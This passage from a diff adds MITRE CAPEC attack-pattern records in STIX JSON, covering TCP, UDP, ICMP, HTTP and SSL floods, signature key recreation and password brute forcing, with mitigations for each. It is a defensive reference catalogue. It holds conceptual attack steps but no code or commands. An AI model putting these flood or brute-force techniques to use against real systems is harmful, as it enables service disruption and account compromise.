Service: Service Exhaustion Flood", + "external_id": "T1499.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/002" + } + ], + "id": "attack-pattern--172e2289-333b-4796-9afd-94140c9480e8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "TCP Flood", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the ability to generate a large amount of TCP traffic to send to the target port of a functioning server." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, an organization can monitor incoming packets and look for patterns in the TCP traffic to determine if the network is under an attack. The potential target may implement a rate limit on TCP SYN messages which would provide limited capabilities while under attack.", + "id": "course-of-action--9ba2ccdc-749a-40ac-94fe-dd01b63d365b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-482-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--927e4fec-c04f-40f4-becb-c817045ecf24", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ba2ccdc-749a-40ac-94fe-dd01b63d365b", + "spec_version": "2.1", + "target_ref": "attack-pattern--172e2289-333b-4796-9afd-94140c9480e8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it a generalization of CAPEC-230: XML Nested Payloads and CAPEC-231: XML Oversized Payloads. Please refer to these CAPECs going forward.", + "external_references": [ + { + "external_id": "CAPEC-484", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/484.html" + } + ], + "id": "attack-pattern--59a00678-cf9d-461d-91b6-bfa53fd4f0bb", + "modified": "2019-09-30T00:00:00.000Z", + "name": "DEPRECATED: XML Client-Side Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker obtains an authoritative or reputable signer's private signature key by exploiting a cryptographic weakness in the signature algorithm or pseudorandom number generation and then uses this key to forge signatures from the original signer to mislead a victim into performing actions that benefit the attacker.", + "external_references": [ + { + "external_id": "CAPEC-485", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/485.html" + }, + { + "external_id": "CWE-330", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/330.html" + }, + { + "description": "Unsecure Credentials: Private Keys", + "external_id": "T1552.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/004" + }, + { + "description": "P.J. Leadbitter, D. Page, N.P. Smart, Attacking DSA Under a Repeated Bits Assumption, 2004--07, http://www.iacr.org/archive/ches2004/31560428/31560428.pdf", + "external_id": "REF-419", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Debian Security, DSA-1571-1 openssl -- predictable random number generator, 2008--05---13, http://www.debian.org/security/2008/dsa-1571", + "external_id": "REF-420", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--5b01885b-ebb8-4b72-8314-6fb4729eda47", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Signature Spoofing by Key Recreation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An authoritative signer is using a weak method of random number generation or weak signing software that causes key leakage or permits key inference.", + "An authoritative signer is using a signature algorithm with a direct weakness or with poorly chosen parameters that enable the key to be recovered using signatures from that signer." + ], + "x_capec_skills_required": { + "High": "Ability to create malformed data blobs and know how to present them directly or indirectly to a victim." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure cryptographic elements have been sufficiently tested for weaknesses.", + "id": "course-of-action--7bbe40a9-49b0-4520-838f-075ba95e1ab6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-485-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--42e7e94d-1991-4bfc-ae5f-1379eb9e797a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7bbe40a9-49b0-4520-838f-075ba95e1ab6", + "spec_version": "2.1", + "target_ref": "attack-pattern--5b01885b-ebb8-4b72-8314-6fb4729eda47", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a flooding attack using the UDP protocol with the intent to deny legitimate users access to a service by consuming the available network bandwidth. Additionally, firewalls often open a port for each UDP connection destined for a service with an open UDP port, meaning the firewalls in essence save the connection state thus the high packet nature of a UDP flood can also overwhelm resources allocated to the firewall. UDP attacks can also target services like DNS or VoIP which utilize these protocols. Additionally, due to the session-less nature of the UDP protocol, the source of a packet is easily spoofed making it difficult to find the source of the attack.", + "external_references": [ + { + "external_id": "CAPEC-486", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/486.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + } + ], + "id": "attack-pattern--bb4d350b-c500-45d6-97c2-c0adccbe6bad", + "modified": "2022-09-29T00:00:00.000Z", + "name": "UDP Flood", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the ability to generate a large amount of UDP traffic to send to the desired port of a target service using UDP." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, modern firewalls drop UDP traffic destined for closed ports, and unsolicited UDP reply packets. A variety of other countermeasures such as universal reverse path forwarding and remote triggered black holing(RFC3704) along with modifications to BGP like black hole routing and sinkhole routing(RFC3882) help mitigate the spoofed source IP nature of these attacks.", + "id": "course-of-action--7547eca0-e697-4517-a5ea-a7cf9a8da506", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-486-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d51664cd-4d4a-4d9d-a633-187820aacb6a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7547eca0-e697-4517-a5ea-a7cf9a8da506", + "spec_version": "2.1", + "target_ref": "attack-pattern--bb4d350b-c500-45d6-97c2-c0adccbe6bad", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a flooding attack using the ICMP protocol with the intent to deny legitimate users access to a service by consuming the available network bandwidth. A typical attack involves a victim server receiving ICMP packets at a high rate from a wide range of source addresses. Additionally, due to the session-less nature of the ICMP protocol, the source of a packet is easily spoofed making it difficult to find the source of the attack.", + "external_references": [ + { + "external_id": "CAPEC-487", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/487.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + } + ], + "id": "attack-pattern--2e017307-7bab-419b-972c-8dae9e089572", + "modified": "2022-09-29T00:00:00.000Z", + "name": "ICMP Flood", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the ability to generate a large amount of ICMP traffic to send to the target server." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, an organization can enable ingress filtering. Additionally modifications to BGP like black hole routing and sinkhole routing(RFC3882) help mitigate the spoofed source IP nature of these attacks.", + "id": "course-of-action--fb127f46-6f57-4569-b6c8-e5ae71cdaee4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-487-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aec19b04-5aac-4130-b0dc-e5bb2841bab7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fb127f46-6f57-4569-b6c8-e5ae71cdaee4", + "spec_version": "2.1", + "target_ref": "attack-pattern--2e017307-7bab-419b-972c-8dae9e089572", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a flooding attack using the HTTP protocol with the intent to deny legitimate users access to a service by consuming resources at the application layer such as web services and their infrastructure. These attacks use legitimate session-based HTTP GET requests designed to consume large amounts of a server's resources. Since these are legitimate sessions this attack is very difficult to detect.", + "external_references": [ + { + "external_id": "CAPEC-488", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/488.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Endpoint Denial of Service:Service Exhaustion Flood", + "external_id": "T1499.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/002" + }, + { + "description": "HTTP Flood Attack", + "external_id": "REF-751", + "source_name": "reference_from_CAPEC", + "url": "https://www.cloudflare.com/learning/ddos/http-flood-ddos-attack/" + } + ], + "id": "attack-pattern--d43c7ffa-16a5-4eb9-8c29-3391cc7ff269", + "modified": "2023-01-24T00:00:00.000Z", + "name": "HTTP Flood", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the ability to generate a large amount of HTTP traffic to send to a target server." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use a Web Application Firewall (WAF) to help filter out malicious traffic. This can be setup with rules to block IP addresses found in IP reputation databases, which contains lists of known bad IP addresses. Analysts should also monitor when the traffic flow becomes abnormally large, and be able to add on-the-fly rules to block malicious traffic. Special care should be taken to ensure low false positive rates in block rules and functionality should be implemented to allow a legitimate user to resume sending traffic if they have been blocked.", + "id": "course-of-action--2b7572ea-6dc7-4734-810a-1dd9611f435e", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-488-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ed0e71de-8def-40f3-9a63-1cdcb946c954", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2b7572ea-6dc7-4734-810a-1dd9611f435e", + "spec_version": "2.1", + "target_ref": "attack-pattern--d43c7ffa-16a5-4eb9-8c29-3391cc7ff269", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Hire a third party provider to implement a Web Application Firewall (WAF) for your application. Third party providers have dedicated resources and expertise that could allow them to update rules and prevent HTTP Floods very quickly.", + "id": "course-of-action--e513ee65-a2f8-450c-8b8c-3d133d7b5876", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-488-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a45db50b-73a2-4ce7-a16f-701e36124c60", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e513ee65-a2f8-450c-8b8c-3d133d7b5876", + "spec_version": "2.1", + "target_ref": "attack-pattern--d43c7ffa-16a5-4eb9-8c29-3391cc7ff269", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use a load balancer such as nginx to prevent small scale HTTP Floods by dispersing traffic between a group of servers.", + "id": "course-of-action--a7612a56-a6bc-4802-9430-8ca1c92a4a02", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-488-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cb4fc921-8f0d-4d6a-b61e-55f683bc0a9c", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a7612a56-a6bc-4802-9430-8ca1c92a4a02", + "spec_version": "2.1", + "target_ref": "attack-pattern--d43c7ffa-16a5-4eb9-8c29-3391cc7ff269", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Make a requesting machine solve some kind of challenge before allowing them to send an HTTP request. This could be a captcha or something similar that works to deter bots.", + "id": "course-of-action--49f16706-cef6-476c-902e-ca7d425a38d8", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-488-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04107b1a-930b-4176-95d0-e7209880a9b9", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--49f16706-cef6-476c-902e-ca7d425a38d8", + "spec_version": "2.1", + "target_ref": "attack-pattern--d43c7ffa-16a5-4eb9-8c29-3391cc7ff269", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a flooding attack using the SSL protocol with the intent to deny legitimate users access to a service by consuming all the available resources on the server side. These attacks take advantage of the asymmetric relationship between the processing power used by the client and the processing power used by the server to create a secure connection. In this manner the attacker can make a large number of HTTPS requests on a low provisioned machine to tie up a disproportionately large number of resources on the server. The clients then continue to keep renegotiating the SSL connection. When multiplied by a large number of attacking machines, this attack can result in a crash or loss of service to legitimate users.", + "external_references": [ + { + "external_id": "CAPEC-489", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/489.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Endpoint Denial of Service:Service Exhaustion Flood", + "external_id": "T1499.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/002" + } + ], + "id": "attack-pattern--f30a7c37-4d87-41d2-a103-c995948076f3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "SSL Flood", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the ability to generate a large amount of SSL traffic to send a target server." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, an organization can create rule based filters to silently drop connections if too many are attempted in a certain time period.", + "id": "course-of-action--6d85f1a8-2ea9-4b71-946c-770993335e06", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-489-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--63e515c5-ea52-4e4c-947f-ddf3f6b91725", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6d85f1a8-2ea9-4b71-946c-770993335e06", + "spec_version": "2.1", + "target_ref": "attack-pattern--f30a7c37-4d87-41d2-a103-c995948076f3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary tries every possible value for a password until they succeed. A brute force attack, if feasible computationally, will always be successful because it will essentially go through all possible passwords given the alphabet used (lower case letters, upper case letters, numbers, symbols, etc.) and the maximum length of the password.", + "external_references": [ + { + "external_id": "CAPEC-49", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/49.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-257", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/257.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "description": "Brute Force:Password Guessing", + "external_id": "T1110.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1110/001" + } + ], + "id": "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Password Brute Forcing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--7b423196-9de6-400f-91de-a1f26b3f19f1" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A system does not enforce a strong password policy and the user picks a five letter password consisting of lower case English letters only. The system does not implement any password throttling mechanism. Assuming the adversary does not know the length of the users' password, an adversary can brute force this password in maximum 1+26+26^2+26^3+26^4+26^5 = 1 + 26 + 676 + 17576 + 456976 + 11,881,376 = 12,356,631 attempts, and half these tries (6,178,316) on average. Using modern hardware this attack is trivial. If the adversary were to assume that the user password could also contain upper case letters (and it was case sensitive) and/or numbers, than the number of trials would have been larger.\n An adversary's job would have most likely been even easier because many users who choose easy to brute force passwords like this are also likely to use a word that can be found in the dictionary. Since there are far fewer valid English words containing up to five letters than 12,356,631, an attack that tries each of the entries in the English dictionary would go even faster.\n ", + "A weakness exists in the automatic password generation routine of Mailman prior to 2.1.5 that causes only about five million different passwords to be generated. This makes it easy to brute force the password for all users who decided to let Mailman automatically generate their passwords for them. Users who chose their own passwords during the sign up process would not have been affected (assuming that they chose strong passwords). See also: CVE-2004-1143" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine application's/system's password policy: Determine the password policies of the target application/system.

    2. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc.).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks).

Exploit

  1. Brute force password: Given the finite space of possible passwords dictated by the password policy determined in the previous step, try all possible passwords for a known user ID until application/system grants access.

    2. Techniques
    Manually or automatically enter all possible passwords through the application/system's interface. In most systems, start with the shortest and simplest possible passwords, because most users tend to select such passwords if allowed to do so.
    Perform an offline dictionary attack or a rainbow table attack against a known password hash.
", + "x_capec_extended_description": "\n A system will be particularly vulnerable to this type of an attack if it does not have a proper enforcement mechanism in place to ensure that passwords selected by users are strong passwords that comply with an adequate password policy. In practice a pure brute force attack on passwords is rarely used, unless the password is suspected to be weak. Other password cracking methods exist that are far more effective (e.g. dictionary attacks, rainbow tables, etc.). Knowing the password policy on the system can make a brute force attack more efficient. For instance, if the policy states that all passwords must be of a certain level, there is no need to check smaller candidates.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170" + ], + "x_capec_prerequisites": [ + "An adversary needs to know a username to target.", + "The system uses password based authentication as the one factor authentication mechanism.", + "An application does not have a password throttling mechanism in place. A good password throttling mechanism will make it almost impossible computationally to brute force a password as it may either lock out the user after a certain number of incorrect attempts or introduce time out periods. Both of these would make a brute force attack impractical." + ], + "x_capec_resources_required": [ + "A powerful enough computer for the job with sufficient CPU, RAM and HD. Exact requirements will depend on the size of the brute force job and the time requirement for completion. Some brute forcing jobs may require grid or distributed computing (e.g. DES Challenge)." + ], + "x_capec_skills_required": { + "Low": "A brute force attack is very straightforward. A variety of password cracking tools are widely available." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement a password throttling mechanism. This mechanism should take into account both the IP address and the log in name of the user.", + "id": "course-of-action--1260aa3b-67cb-4194-9b7c-1edcd9cea382", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-49-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a2efb506-562c-41e5-afef-c5f89f5bf4ab", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1260aa3b-67cb-4194-9b7c-1edcd9cea382", + "spec_version": "2.1", + "target_ref": "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Put together a strong password policy and make sure that all user created passwords comply with it. Alternatively automatically generate strong passwords for users.", + "id": "course-of-action--67382257-6794-48ac-82a0-f33260b6f0db", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-49-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c0f08626-b782-458e-bf5e-36ceaf04f850", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--67382257-6794-48ac-82a0-f33260b6f0db", + "spec_version": "2.1", + "target_ref": "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Passwords need to be recycled to prevent aging, that is every once in a while a new password must be chosen.", + "id": "course-of-action--bb36d937-986b-43eb-aa65-3e773af8ce32", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-49-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": 